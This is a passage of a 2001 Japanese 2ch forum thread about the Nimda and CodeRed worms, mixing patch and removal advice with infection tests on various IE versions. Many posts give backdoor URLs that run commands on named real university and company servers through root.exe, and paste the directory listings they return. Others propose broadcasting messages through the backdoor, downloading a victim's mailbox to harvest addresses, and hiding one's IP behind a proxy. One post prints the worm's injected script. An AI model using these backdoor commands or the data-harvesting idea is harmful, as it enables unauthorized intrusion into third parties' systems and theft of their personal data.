NT4.0Server/SP3/IIS3でNimdaに攻撃されまくってます。駆除ツール当ててもきりがない状態、
NT4.0SP5を当てたくない事情があるんですが、この環境のままで当てられるパッチってないですかね?

296 :名無しさん@お腹いっぱい。:01/09/24 03:16
しかし、あまりにタイムリーだったんだけどホントにわざとだったのかな?

297 :名無しさん@お腹いっぱい。:01/09/24 03:18
>>296

かなりクサイですね

298 :名無しさん@お腹いっぱい。:01/09/24 03:19
あしたの朝>>49-94みたくなってたらイヤなのでsage

299 :名無しさん@お腹いっぱい。:01/09/24 03:20
別な意味でニムダにやられてる・・。
http://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi

300 : :01/09/24 03:20
わざとじゃなくて、この板の住人だったんじゃない?w

301 :名無しさん@お腹いっぱい。:01/09/24 03:22
>>300
そんな気もする。でも結構前から話題だったよね。

302 :名無しさん@お腹いっぱい。:01/09/24 03:23
>>300
わざとってことにしておかないと気むずかしいヒトが気を悪くするのそういうことにしてあげておいて・・。

303 :234:01/09/24 03:24
ノーマル2K+IE6でメディアプレーヤーが開くけどその後暫くするとIEが固まる。
でもそれらしいプロセスは走っていない。
キャッシュにはreadmeがあるけどキャッシュを削除すると消えるし何も悪さしてなさそうだよ。

304 : :01/09/24 03:25
    うゎ〜ん。ニムダに感染しちゃったよー。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            Λ_Λ
          ( ゜∀⊂ヽ ニヤリ
          ⊂    ノ
           人  Y
          し (_)

305 :名無しさん@お腹いっぱい。:01/09/24 03:31
>>303
ありがとー。もひとつお願い。その状態でMediaPlayerをアンインストール
してアクセスするとどうなるでしょうか?

306 :234:01/09/24 03:39
正確には開こうとするんだけど失敗してる。
多分ファィルが壊れていると見ている。

>>305
実はちょっとオンラインでもやってみたんだが・・・火暴
はじめはメディアプレーヤーがインストールしてない状態だったので
インストールをしねーか?と聞かれた。
悪さしてないのを確認しながら無事インストール。
その後メディアプレーヤーの立ち上げには失敗している。
IEは固まる。
プロセスの異常はなし。しかしキャッシュにはダウンロードされている。
キャッシュのニムダは何も悪さしていない。

307 :名無しさん@お腹いっぱい。:01/09/24 03:42
あ、何度もごめん。インストールしないか?にインストール「しない」と答えてほしい…^^;
うまくいくと(藁)、ウィルスが実行されるはず。

308 :234:01/09/24 03:44
そかそかインストールしてしまうとwavはメディアプレーヤーに渡されて当然だな。
アンインストールして今度はオフラインでやってみるね。

309 :名無しさん@お腹いっぱい。:01/09/24 03:50
ちなみに、

MediaPlayerがあるとwaveファイル(nimdaが装ってる)は必ずそれに
ファイルを渡すから、実行されない。もちろんMediaPlayerは変なフォーマット
のファイルがくるからエラーを起こすけど。

0)
MediaPlayerがないと、IEは他のアプリを使ってwaveファイルを実行
使用とする。この時、拡張子が正しくwavとかなら、再生用のアプリに
渡されるけど、nimdaは拡張子がexeなので、そのまま実行してしまう。
IE5.5とかIE5.01とかは。

1)
IE5.5SP2では拡張子がexeのファイルはファイルダウンロードの処理に
なるように変更されている。

2)
IE6の俺の環境では処理が違ってて、拡張子をtmpに変えて、それを
実行しようとする。もちろん拡張子がtmpのファイルを再生できるアプリ
もないし、tmp自体をexe見たいに実行することもできないから、
どのアプリで開くか?ってダイアログが出る。

1)や2)はどうやらOutlookExpress関連のプログラムがやっている
みたいで、もしW2KにIE6をインストールしたとき、OutlookExpree関連
のプログラムを完全には更新されないとすれば、そのまま実行して
しまうはず。

310 :234:01/09/24 03:53
いいえを選択すると使用するアプリをどれにするか聞いてきた。
その時点で既にwbk4.tmpというファィル名になっている。

311 :名無しさん@お腹いっぱい。:01/09/24 04:03
ほほう。
234殿には俺の感謝を捧げたい。

312 :234:01/09/24 04:10
>>309
実行はしていないようです。
MSはキャッシュのニムダをウィルスソフトが検知してしまう為
あるいはメディアプレーヤー起動でブラクラ状態になってしまうので
IE6も追加したのかなー?
それとももっと違う条件があるのだろうか?

313 :名無しさん@お腹いっぱい。:01/09/24 04:10
つまり無理矢理実行しようとしない限りは大丈夫かな?ってことか。
IE6とW2Kの謎がだいぶ解き明かされてきたね。

314 :名無しさん@お腹いっぱい。:01/09/24 04:15
>>310
あれ?そうなんだ…
うーん、その動作は俺のW2KSP2+IE5.5SP2にIE6をインストールした
時と同じで、非常にすばらしいんだが…
それだと、何個か耳にするW2K+IE6は危険って話は、どう解釈したらよいもんか…

なんにしても、いろいろ、ありがとうございました。(__)

315 :名無しさん@お腹いっぱい。:01/09/24 04:17
とりあえず更新

W2K + IE6 …感染しない(234さんの環境)
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず))
W2KSP2 + IE5.5SP2 + IE6…感染しない (俺の環境)

316 :234:01/09/24 04:24
どうやら>>309さんによるとSP2でも同じみたいなのでダウンロードでキャッシュには残るけど
発病はしないに決定。
もうHDDを元に戻します。

317 :ニ武田 浩二:01/09/24 04:45
皆さん僕のことで盛り上がってるようですね、何か・・・?

318 : :01/09/24 04:53
うーん、じゃ実行してしまうのはOEのバグだけなのか?

319 :名無しさん@お腹いっぱい。:01/09/24 05:42
お前ら、寝ろ

320 :名無しさん@お腹いっぱい。:01/09/24 05:43
あ〜、感染させるのも飽きた

321 :名無しさん@お腹いっぱい。:01/09/24 05:44
お前ら、もっと感染しろよ

322 :名無しさん@お腹いっぱい。:01/09/24 05:49
>>319-312
あんた、毎日暇なんだねぇ

323 :名無しさん@お腹いっぱい。:01/09/24 05:57
>>322
て言うかおもしろい

324 :名無しさん@お腹いっぱい。:01/09/24 06:14
>>323
何が?

325 :名無しさん@お腹いっぱい。:01/09/24 06:31
最近になって5分に一度くらい
未使用ポートブロック機能が通信をブロックしました。 詳細:
でノートン先生のログがすごいのだが。
これって Nimda のせい?

326 : :01/09/24 06:39
nimdaなら80。
80未仕様?つうかサーバー?

327 :名無しさん@お腹いっぱい。:01/09/24 09:59
>>325
CordRed
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは ***.***.***.***,http

328 :ウトゥ:01/09/24 10:06
>>327
たぶんNimda
未使用ポートブロック機能が通信をブロックしました。 詳細:

329 :名無しさん@お腹いっぱい。:01/09/24 11:48
ttp://www1.sphere.ne.jp/noone

>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド

>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド

>いいかげんにしてくれ〜

ネタ決定だな。
親切に掲示板に書き込んだ人。ご苦労さん(w

330 :名無しさん@お腹いっぱい。:01/09/24 12:11
WIN2KもIEもSP2ダウンロードするの面倒なんだけど
まだ雑誌のCD-ROMとかで配布してないのかなぁ。

331 :名無しさん@お腹いっぱい。:01/09/24 12:25
>>329
俺にとってはいいネタだったよ。掲示板に、

このHP
nimdaに感染してるんで閉鎖して下さいね。

って、1つだけポツンと書き込まれてたときは爆笑した。

332 :>:01/09/24 12:26
たしかに
CD-ROMとか緊急でリリースすべきだろうね。
遅い回線を使ってたらダウンロード大変だし。。。

333 :ん〜ま:01/09/24 12:32
ちなみに、トレンドマイクロのウイルスサーチだと*.emlファイルのNimdaは検索出来ぬ。
base64はデコードできないのかな?中途半端ですなあ。

334 :名無しさん@お腹いっぱい。:01/09/24 12:57
>>333
>base64はデコードできないのかな?
違うと思うぞ。
検索オプションの検索対象に”ユーザー選択”選んでないか?
してるんなら”すべて”か”トレンドマクロ推奨で”もう一度検索してみて。

335 :/:01/09/24 13:15
http://61.134.4.14/

336 :名無しさん@お腹いっぱい。:01/09/24 13:33
>335
I IS A BOY とは、笑える。どこの人かな?
^^^
hacker by jsl 2001 09 07 I LO
VE YOU I IS A BOY</p>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>

337 :厨房クラッカーだな(藁:01/09/24 13:39
>>336
CodeRed、NIMDAに感染してバックドア開きっぱなしのサーバ
攻撃してもねぇ・・・
自分の低レベル振りをアピールして恥ずかしくないのかねぇ?(藁

338 :名無しさん@お腹いっぱい。:01/09/24 13:43
>>330
Win2KのSP2なら、マイクロソフトのサイト(下のURL)で申し込めば、
無償で送ってくれるよ。1週間くらいでとどく。
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
んで、IE5.01のSPは、Win2KのSP2に入っている。

339 :330:01/09/24 13:54
>>338
早速申し込みました。
おれのWin不正シリアルなんだけど、ま、いっか

340 :名無しさん@お腹いっぱい。:01/09/24 14:34
>>319-321
・・・・こいつニムダわかってないよな(^^;

341 :名無しさん@お腹いっぱい。:01/09/24 14:52
>>340
Nimdaは人間にも感染するのデス。2chという経路で。
ひがなNimdaの話題に専念させ、本来の機能を著しくパワーダウンさせるのデス。
あなたもすでに感染していマス。

342 :名無しさん@お腹いっぱい。:01/09/24 14:52
さすが中国。

ttp://www1.fl.kansai-u.ac.jp/

いまさら感染するなよ。

343 :名無しさん@お腹いっぱい。:01/09/24 14:53
>>341

えΣ<(゜▽゜;)>

344 :名無しさん@お腹いっぱい。:01/09/24 14:58
>>342

接触研究会だってよ(w

345 :名無しさん@お腹いっぱい。:01/09/24 15:50
ttp://www.d-link.co.jp/

ここ連絡先ないじゃん!

346 :名無しさん@お腹いっぱい。:01/09/24 15:59
>>342

やっぱあれだね、長いこと更新せずほってあるようなところがよく感染したままになってるね(^^;

347 :名無しさん@お腹いっぱい。:01/09/24 16:31
http://www1.fl.kansai-u.ac.jp/

348 : :01/09/24 16:31
↑感染ページね。

349 :名無しさん@お腹いっぱい。:01/09/24 16:34
http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\
バックドア開きっぱなしじゃん。

350 :名無しさん@お腹いっぱい。:01/09/24 16:47
>>342-349
駆除した跡はあるから再感染だな。
バックドア開けっ放しじゃ駆除しても意味ないんだよ…

351 :名無しさん@お腹いっぱい。:01/09/24 17:40
Directory of c:\

2001/09/23 04:36p 57,344 Admin.dll
2001/09/23 04:36p 517 default.asp
2001/09/23 04:36p 517 default.htm
2001/09/20 01:46a <DIR> DrWatson
2001/09/23 04:36p 517 index.asp
2001/09/23 04:36p 517 index.htm
2001/09/23 04:36p <DIR> InetPub
2001/06/23 12:09p <DIR> JUST
2000/09/13 04:27p <DIR> KPCMS
2001/09/22 01:30p <DIR> NIMDASCN
2000/06/17 03:08p <DIR> Perl
2001/09/22 02:30p <DIR> Program Files
2001/09/23 04:35p 79,225 readme.eml
2001/09/24 05:43p <DIR> TEMP
2001/09/23 07:19p 57,344 TFTP10060
2001/09/23 07:19p 57,344 TFTP10104
・・・省略・・・
2001/09/23 07:17p 57,344 TFTP9952
2001/09/22 01:30p <DIR> ToFolder
2001/07/21 03:36p <DIR> Windows Update Setup Files
2001/09/23 04:35p <DIR> WINNT
1555 File(s) 88,849,805 bytes
11 Dir(s) 821,965,312 bytes free

めちゃくちゃだな・・・

352 :名無しさん@お腹いっぱい。:01/09/24 17:52
>>350

こーどれっどかなんかに感染して、外面上だけ駆除して、後生大事にバックドアは保持してるってこと?(^^;

その後もニムダとかにかかって、また外面上だけ修復しても、バックドアは大切に保持?(^^;;;;

353 :名無しさん@お腹いっぱい。:01/09/24 17:56
>>349

すげえ、なんでもできるね(^^;

354 :-:01/09/24 17:57
俺、このHP大好き!
http://members.tripod.co.jp/bingo852/

355 :名無しさん@お腹いっぱい。:01/09/24 18:11
ういるす検知系のソフトなにも入ってないじゃん・・。

http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\progra~1

356 :名無しさん@お腹いっぱい。:01/09/24 18:19
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3059NIMDAINF.htm
Trendmicro_Nimdaの挙動のまとめ(ガイシュツかも)

357 :名無しさん@お腹いっぱい。:01/09/24 18:31
age

358 :名無しさん@お腹いっぱい。:01/09/24 18:40
>>350
>>>342-349
> 駆除した跡はあるから再感染だな。

2001/09/22 01:30p <DIR> NIMDASCN

これか・・・。


> バックドア開けっ放しじゃ駆除しても意味ないんだよ…

しょーがねーなぁ・・。

359 :名無しさん@お腹いっぱい。:01/09/24 19:14
あーあー・・。

http://61.134.4.14/scripts/root.exe?/c%20dir%20c:\

360 :名無しさん@お腹いっぱい。:01/09/24 19:15
http://www.powerstage.com/scripts/root.exe?/c%20dir%20c:\

ありゃまあ・・。

361 :名無しさん@お腹いっぱい。:01/09/24 19:17
なんだかねぇ・・。

http://210.12.157.160/scripts/root.exe?/c%20dir%20c:\

362 :名無しさん@お腹いっぱい。:01/09/24 19:19
むー・・・。
http://210.12.157.160/scripts/root.exe?/c%20type%20c:\readme.eml

363 :名無しさん@お腹いっぱい。:01/09/24 19:26
おいおい、いいのか?いいのか?

http://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\Progra~1

364 :名無しさん@お腹いっぱい。:01/09/24 19:33
停止サイトでもバックドア開いてるとこは多いな・・。

365 :名無しさん@お腹いっぱい。:01/09/24 19:43
ここまた感染するぞ・・。

宝塚造形芸術大学 短期大学部
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
http://www.takara-univ.ac.jp

366 :名無しさん@お腹いっぱい。:01/09/24 19:44
>>365

選んでる場合じゃないよ・・。>志望学生

宝塚造形芸術大学 短期大学部

情報化社会に即対応の専門技術を習得する。
あなたの感性、技術を生かせるコース、じっくりと選んでほしい。

367 :名無しさん@お腹いっぱい。:01/09/24 19:49
他スレで出てたけど、
http://hoge.or.jp/scripts/root.exe?/c%20net%20send%20localhost%20むにゃむにゃ
で警告出来ないものかのう…。

368 :名無しさん@お腹いっぱい。:01/09/24 20:00
>>367

たとえこちらで気付いても、ニムダさわぎでWebページは閉じていて連絡先が分からないところも多いよ・・。

369 :名無しさん@お腹いっぱい。:01/09/24 20:00
「チャック開いてますよ」って。

370 :名無しさん@お腹いっぱい。:01/09/24 20:01
>>367

こういうところは鯖ほったらかしで、たとえコンソールなどに警告しても見てないと思われ・・。

371 : :01/09/24 20:03
宝塚造形芸術大学 短期大学部 は気付いたみたいだよ。

372 :名無しさん@お腹いっぱい。:01/09/24 20:02
>>368
そのためのwhois。自動化できないものか。

373 :名無しさん@お腹いっぱい。:01/09/24 20:10
>>369
なかなか他人には言えないもんだよなぁ

374 :名無しさん@お腹いっぱい。:01/09/24 20:13
というか、localhostでなくてbroadcastでnet sendすればいいのか。

375 :名無しさん@お腹いっぱい。:01/09/24 20:14
>>369

いやーん、はずかしくて言えない(ノ_;)

376 :名無しさん@お腹いっぱい。:01/09/24 20:16
>>371

http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\

気付いてますか?

Directory of c:\

01/09/21 03:44p 524,288 20010921log.evt
99/04/28 04:09p 0 AUTOEXEC.BAT
99/04/28 05:12p 279 BOOT.PCP
99/04/28 04:09p 0 CONFIG.SYS
99/04/28 05:13p <DIR> DMI
99/04/28 05:14p <DIR> ESM
01/09/22 02:15a 988,652 Exchange Server Setup.log
01/03/10 11:06a <DIR> exchsrvr
01/09/22 01:01a <DIR> InetPub
01/09/20 10:33a <DIR> log_backup
01/09/22 01:51a 6,220 mpssetup.log
01/03/02 11:40a <DIR> msp
99/04/28 04:37p <DIR> Multimedia Files
01/09/22 02:23a 402,653,184 pagefile.sys
01/09/21 05:49p <DIR> Program Files
01/09/19 03:26p <DIR> recycled
01/09/22 01:01a <DIR> scremove
01/09/22 01:06p <DIR> TEMP
01/01/10 06:37p 53,019 ucspi-tcp-0.88.tar.gz
99/04/28 04:40p <DIR> update
01/03/02 11:36a <DIR> urlcache
01/09/23 03:05a <DIR> WINNT
00/05/22 04:19p 12,800 Step2.doc
01/09/20 07:03p <DIR> デスクトップ
24 File(s) 404,238,442 bytes
2,799,830,016 bytes free

377 :名無しさん@お腹いっぱい。:01/09/24 20:18
一件メール送ったら速攻で閉じたようだ。
これで、CodeRedも含めて少しは静かになればいいんだが。

378 :377:01/09/24 20:20
と思ったら、まだだった。アクセスが集中したかな?(w

379 :名無しさん@お腹いっぱい。:01/09/24 20:20
>>376

一つ気になったがこれはなんだろうか?>宝塚ほげほげ学園

00/05/22 04:19p 12,800 Step2.doc

思うに、学生の課題と思われ・・。

380 :名無しさん@お腹いっぱい。:01/09/24 20:26
C:\Documents and Settings\ユーザー名\Local Settings\ApplicationData
\Identities\{****-****-****-****-************}\Microsoft\Outlook Express\受信トレイ.dbx
をDLしてメールアドレスを探る。

381 :名無しさん@お腹いっぱい。:01/09/24 20:45
どこかのスレにプロバイダー別のIP割り当て表の
ページへのリンク貼ってあったと思うんだけど
わかる人いますか?

382 :名無しさん@お腹いっぱい。:01/09/24 21:06
>>380
流石にそれは捕まるだろ(藁

383 :名無しさん@お腹いっぱい。:01/09/24 21:16
>>382
何で?

384 :名無しさん@お腹いっぱい。:01/09/24 21:17
>>380
結局、解る奴にとっては色々遊び場増えるのね(w
てーか、初期の頃オリエントのサイト感染してたのには笑ったけど。
俺、オリコカード作ってないから良いけど。
公開サーバには流石に置かないか。

385 : :01/09/24 21:18
http://アドレス/root.exe?/c%20net%20send%20localhost%20%22このサーバにはCodeRedの開けたバックドアが仕組まれています。今すぐroot.exeの削除をオススメします。  by 2ちゃんねら〜%22
これで馬鹿な管理者も気付くだろう?

386 :名無しさん@お腹いっぱい。:01/09/24 21:19
>>384

もしかしてにむだ+バックドアサイトで表紙だけ無くなってるのって、親切な人が分かるように削除してあげたとか?(^^;

387 :名無しさん@お腹いっぱい。:01/09/24 21:20
>>383
個人情報ぱくっちゃマズイって・・・

388 :名無しさん@お腹いっぱい。:01/09/24 21:22
>>387
この場合、晒してるほうが悪いんじゃないか?
380がバックドア仕掛けたんなら別だけど。

389 :名無しさん@お腹いっぱい。:01/09/24 21:23
URLを打ち込むだけで捕まるかは微妙だと思うな。
でも事実上サーバを完全にコントロール出来るからな・・・

390 :名無しさん@お腹いっぱい。:01/09/24 21:26
>>385
net%20send%20localhost
 ↓
net%20send%20*
 ↓
(゚д゚)ウマー?

391 :385:01/09/24 21:27
>>390
君過激♪

392 :名無しさん@お腹いっぱい。:01/09/24 21:31
>>385

やったおいらのIPは感染サーバーのログに残るよなぁ?

393 :名無しさん@お腹いっぱい。:01/09/24 21:35
>>392
串使ったら?

394 :名無しさん@お腹いっぱい。:01/09/24 21:36
>>393

了解(^^;

395 :名無しさん@お腹いっぱい。:01/09/24 22:14
うひい(@@〜☆

http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\

396 :名無しさんをお腹いっぱい。:01/09/24 22:17
取引先のタコケチ社長に電話でSP2へのアップの手ほどきしました。
「SP2をインストールするために、念のために一旦ウィルス対策ソフトを止めます。」
と言うのに対して
「ウィルス対策ソフトを止めたら、その間にウィルスに感染するかもしれへんやん。
 そんなことになったら、あんたが責任を取ってくれるんか」
仕方が無いから、セットしに行きますということで行ったら、タコのパソコンに入っているのが
ウィルスバスター97。「?」という顔をしていると、「ああ、それ。知り合いにもろてん(もらったんだよ)」
 「これじゃ意味無いですよ。新しいのを買ってください」と言うと、「ええ〜?買うん?
あんた、そういうのの新しいの持ってないん?持ってきて入れてくれんか?」

以降はほとんど無視して、ニムダウィルスチェックして(奇跡的にも?かかって
いなかった。っていうかIE4だったし)IE5.5SP2入れて、「問題なし」と言って
帰ってきてしまったんだけど・・(VBはパチもん97のまんま)

おんなじような個人ユーザーって結構居るんだろうな・・・

397 :名無しさん@お腹いっぱい。:01/09/24 22:20
>396
>タコのパソコンに入っているのが
ウィルスバスター97
(w

398 :396:01/09/24 22:24
>>397

>>タコのパソコンに入っているのが
>>ウィルスバスター97
>(w
本当なんですよ。なんかよそで使わなくなったのをもらってきて
入れたんだとか。部下に聞いたら、
くれた人からも「こんなん入れても意味無いよ」とか言われてたらしいんだけど(笑)

399 :名無しさん@お腹いっぱい。:01/09/24 22:27
>>396
>ウィルスバスター97

最新版持ってても、アップデートの仕方を知らないやつも沢山居るよ(笑)

400 :397:01/09/24 22:27
いや、ニムダ以外のウイルス感染の方が遥かに気になり(w

401 :名無しさん@お腹いっぱい。:01/09/24 22:30
>>396

> ニムダウィルスチェックして(奇跡的にも?かかって
> いなかった。っていうかIE4だったし)

バックドアは大丈夫ですか?

ここの過去ログに、ニムダウィルスチェック・駆除だけしてバックドア健在というようなサイトが報告されているので・・。

402 :名無しさん@お腹いっぱい。:01/09/24 22:31
>>396
タコ社長(失礼)からアイラブユーメールは来なかったかい?(ワラ

403 :名無しさん@お腹いっぱい。:01/09/24 22:31
>>401
クライアントにバックドアは無いだろ?

404 :402:01/09/24 22:32
かぶった・・鬱死

405 :名無しさん@お腹いっぱい。:01/09/24 22:48
>>396
タコ社長は97年にパソコン初めて触って楽しかったんだろうねー。

406 :名無しさん@お腹いっぱい。 :01/09/24 22:48
>>404
not Foundおめ。

407 :名無しさん@お腹いっぱい。:01/09/24 22:54
聞いてください。

私のIEはだいぶ前からSP2にしてあったので大丈夫だと思っていました。
しかし今日新しくNorton AntiVirus2001入れてスキャンしたらいきなり
C:\WINDOWS\Temporary Internet Files\Content.IE5\に
readme.eml が見つかったのでひとまずノートンで消しました。

あわてて↓ここで見たとおり駆除ツールをやってみたのですが、
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a%40mm.removal.tool.html
このツールでは駆除できないと言われます。
しかもこのとき作られるログを見てください。

-----------------------------------------------------------------------
The file "d:\program files\katjusha2102\log\ton.2ch.net\sec\1000870301.dat"
   is dropped by W32.Nimda.A@mm. The tool could not delete this file.

The file "d:\program files\katjusha2102\log\news.2ch.net\news\1000861682.dat"
   is dropped by W32.Nimda.A@mm. The tool could not delete this file.

The W32.Nimda.A@mm removal was unsuccessful.
Here is the report:
The total number of the scanned files: 45207
The number of deleted files: 0
The number of repaired files: 0
The number of viral processes terminated: 0
The tool could not delete 2 W32.Nimda.A@mm files from your PC,
Please contact Technical Support for assistance.
-----------------------------------------------------------------------
かちゅ〜しゃをd:\program files\に入れて使っていますが
かちゅ〜しゃのログにNimdaがいるといってます。
そんなことありえるのでしょうか?

408 :(´∀` ):01/09/24 22:57
>>396
いや、くれた奴が実はソシャルのスキル持ってて、敢えて旧いバージョン
呉れたんだよ。社長が平気で入れるのを見越して。。。
今ごろそいつ、Sub7のサーバー.exeカスタマイズしてるところだよキト(w

409 :名無しさん@お腹いっぱい。:01/09/24 23:06
>>407
レスに書かれているHTMLのコード>>336などを検出してるんじゃないでしょうか。
で、そのツールの但し書きによれば

>感染している.eml、.nws、.doc、.txtファイルは削除します。
>上記4つの拡張子以外の拡張子を持っている.emlファイルは、このツールでは削除されません。

ということで消せなかった、とレポートされたのだと思います。

410 :名無しさん@お腹いっぱい。:01/09/24 23:06
>>407
ノートンって、本体のreadme.emlと感染html関係の上書きスクリプト部分
同じ名前で検出するのかな。そうだとしたらチョとややこしい。
バスターだと接頭がPEとJSで区別されてるからすぐわかるけど。
・・・あんま関係無いレスサゲ。

411 :名無しさん@お腹いっぱい。:01/09/24 23:15
ふと思ったけど
wavの表示を高速にするためにリンク先先読みするソフトで、リンク先の鯖が感染してて
開いてもいないのにこちらも感染なんてありえますか?
(ソフトにもよるでしょうけど)

412 :名無しさん@お腹いっぱい。:01/09/24 23:19
>>411
Wav? Web??

413 :名無しさん@お腹いっぱい。:01/09/24 23:25
>>411
ストリームする時のバッファリングの事かな。。。。
・・と敢えて訳解らん方向に持っていって見る(w

414 :名無しさん@お腹いっぱい。:01/09/24 23:29
>407です。
いちおログを消したら
The W32.Nimda.A@mm has not been found on your computer.
がでてきて安心しました。

この駆除ツールも適当っすねぇ。

415 :名無しさん@お腹いっぱい。:01/09/24 23:34
>410
あっ、ノートンでは2chのログ検出されないっすよ。
駆除ツールでスキャンかけると引っかかります。

416 :名無しさん@お腹いっぱい。:01/09/24 23:35
http://www.geocities.co.jp/SiliconValley/5312/

こんなの見つけた(笑)

417 :410:01/09/24 23:40
>>415
ってー事は、、、、みだりにソース貼ると不味いのか。。
特定環境のユーザーに取っては。。今ごろ気づいた。
サンクス。

418 :名無しさん@お腹いっぱい。:01/09/24 23:45
>>416
まあ、ありかもね。

419 :名無しさん@お腹いっぱい。:01/09/24 23:45
>>333
>>334
これは実のところどうなの?

420 :名無しさん@お腹いっぱい。:01/09/24 23:49
>>416
作者の言うとおりデザインはいまいちだね。
でもいいんじゃないか。

421 :名無しさん@お腹いっぱい。:01/09/24 23:52
「無リン洗剤にはムリンが入ってるんでっしゃろか?」
なんて言う爺ちゃんには
「うん、ムリンが入ってるんだよ」と答えてやった方がいい。
そんな感じのページだね>>416

422 :名無しさん@お腹いっぱい。:01/09/25 00:18
>>385

何人かがやってくれたみたいだけど、とりあえず閉めたのかな?

http://www.takara-univ.ac.jp/
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\

423 :名無しさん@お腹いっぱい:01/09/25 00:33
既出だとおもうが

ねすけ6.1で煮無駄サイトにアクセスすると・・
ダウンロード警告がでます
ダウンロードするとemlファイルがダウンロードされます。
IE5.XがSp2になっていないと・・ダウンロードしたファイルをエクスプローラ等でクリックすると感染します

424 :名無しさん@お腹いっぱい。:01/09/25 00:45
情報が無い。

1.Admin.dllに感染したサイトも、メールをばりばり送るんでしょうか?
2.IEで感染したパソコンも、他のIISサーバーを攻撃に行くんでしょうか?

425 :名無しさん@お腹いっぱい。:01/09/25 00:50
ウィルスバスター97でも、
海外のトレンドマイクロのサイトからパターンファイルをダウンロードして
ファイルにコピーペーストしたら、使いつづけられませんか?

426 :名無しさん@お腹いっぱい。:01/09/25 01:03
今だに同じIP(感染したサーバー)からポートを叩かれてる。
ポートを変えたは良いが・・・・

427 :名無しさん@お腹いっぱい。:01/09/25 01:08
>>426

どこ?バックドアがあるなら串経由でシャットダウンしてやるよ! σ(^-^;;

428 :対策済:01/09/25 01:28
http://61.113.33.218/
http://61.113.0.130/
http://61.113.33.218/
http://www.ucar-tky.or.jp/mokuji.htm

429 :&&:01/09/25 01:33
連休で放置されてる鯖多いんだろうね。。。

430 :&&:01/09/25 01:43
ていうかホスティングの価格さがってるんだし
会社案内ぐらいしか載せてない企業が自前サーバ自営ドメインで
Webサイト開く意義って何かあるの。
危険おかしてまで。。

431 :名無しさん@お腹いっぱい。:01/09/25 01:46
>>430
サンマイクロシステムズやらIBMやらの陰謀です(爆)
eコマースってなに?

432 :名無しさん@お腹いっぱい:01/09/25 01:47
>>430
メールサーバとしてつかうつもりでアブライアンスサーバかったら
Webサーバ機能もまけでついてかからとか・・

433 :&&:01/09/25 01:49
じゃあ今回の騒動に責任はMSだけではなく
サンマイクロシステムズやらIBMやらにもあるな。

434 :名無しさん@お腹いっぱい。:01/09/25 01:50
>>429

明日の朝、日本のニムダ報告件数が一気にふえるぞ。

http://wtc.trendmicro.com/wtc/

435 :1:01/09/25 01:54
http://members.tripod.co.jp/bingo852/

436 :名無しさん@お腹いっぱい。:01/09/25 02:08
>>435
view-source:http://members.tripod.co.jp/bingo852/
何?これ。

437 :ボソッ:01/09/25 02:13
(連休って日本だけ?)

438 :名無しさん@お腹いっぱい。:01/09/25 02:14
>>435
そのエロサイト飽きたよ。何度もコピペするなんて厨房丸出しだな

439 :名無しさん@お腹いっぱい。:01/09/25 02:15
韓国とかも多いけどnet sendは英語でいいんだろうか?
ハングルは分からんし(w

440 :名無しさん@お腹いっぱい。:01/09/25 02:48
    。o 0 〇 ○  ○
   □□
   □□    ■■■■■■
   □□■■■■■■■■■■
   □■■■■■■■■■■■■■
 ■■■■■■■■■■■■■■■■■
   ■■■■■■■■■■■■■■■
   ■■          Zzz...        ■■
   ■■      ∧∧            ■■
   ■■  Zzz. (- - )⌒⌒⊇?    ■■
   ■■    ~~~~~~~~~~~~~~~~    ■■
   ■■■■■■■■■■■■■■■
   ■■■■■■■■■■■■■■■

441 :名無しさん@お腹いっぱい。:01/09/25 02:49
フジTVでホームページ書き換えネタやってる。
・・・・・・・

442 :名無しさん@お腹いっぱい。:01/09/25 02:53
こいつがやってそうだな。

443 :名無しさん@お腹いっぱい。:01/09/25 03:22
http://www.access-us-inc.com/
ここも閉鎖中

444 : :01/09/25 03:47
ウチの会社、偉い人が
「HPを見るだけで感染することなど有り得ない」
と断言しちゃったんで、事実上対策禁止状態・・・。

445 :名無しさん@お腹いっぱい。:01/09/25 04:05
>>444
そいつのPCに感染させてやるのだ。報告きぼーん。

446 :名無しさん@お腹いっぱい。:01/09/25 04:09
厨房な問だから無視ですか? 私も>>424と同じ事聞きたいです
IE経由で感染したwin9X系のPCもIIS攻撃するんでしょうか?

447 : :01/09/25 04:11
>>445
誰か感染したら全社道連れですがな・・・。

448 : :01/09/25 04:14
>>446
しない。W2KでIIS入ってればするけど。

つうか、なんでIIS攻撃だけ気にする?

449 : :01/09/25 04:20
最低限の予防策
1)IE5.1ーSP2,IE5.5ーSP2,IE6+OE6
のいずれかのバージョンにしておく。
2)IEのセキュリティーレベルを中以上にする。
3)readme.exeの警告が出たらキャンセルする。

やっておいた方がいい対策
1)メディアプレイヤーをインストールしておく。
2)Javaのアクティブスクリプトを切る

で合ってる?

450 :446:01/09/25 04:23
即レスありがと IIS攻撃というよりも
攻撃元がwin9XやmeのPCからの直接攻撃も含まれるの
だったらこのアタックの多さも説明できるかと

まがりなりにもIISでサーバたててるのに対策してない人がこんなに
多いなんて自分には信じられません

451 :対策済:01/09/25 04:27
From : ittinfo100@excite.com
Subject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
